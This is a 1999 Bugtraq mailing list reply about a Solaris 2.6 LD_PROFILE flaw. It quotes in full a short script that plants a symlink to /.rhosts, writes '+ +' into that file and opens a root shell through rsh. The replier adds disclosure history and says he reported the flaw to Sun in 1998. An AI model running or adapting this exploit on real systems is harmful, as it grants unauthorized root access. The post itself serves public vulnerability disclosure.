Bugtraq mailing list archives
Re: LD_PROFILE local root exploit for solaris 2.6
From: peak () ARGO TROJA MFF CUNI CZ (Pavel Kankovsky)
Date: Sat, 25 Sep 1999 02:25:52 +0200
On Wed, 22 Sep 1999, Steve Mynott wrote:
> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> # LD_PROFILE local root exploit for solaris
> # steve () tightrope demon co uk 19990922
> umask 000
> ln -s /.rhosts /var/tmp/ps.profile
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps
> echo + + > /.rhosts
> rsh -l root localhost csh -i
Old news. I discovered this problem and informed Sun about it in June 1998. I cannot verify it right now but I think they have already made a patch for it. GNU libc 2.something used to be affected as well. The odds are other platforms having this particular nifty feature (if they exist at all) are still vulnerable because I forgot to tell Bugtraq about it. Oh, mea culpa! :)

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."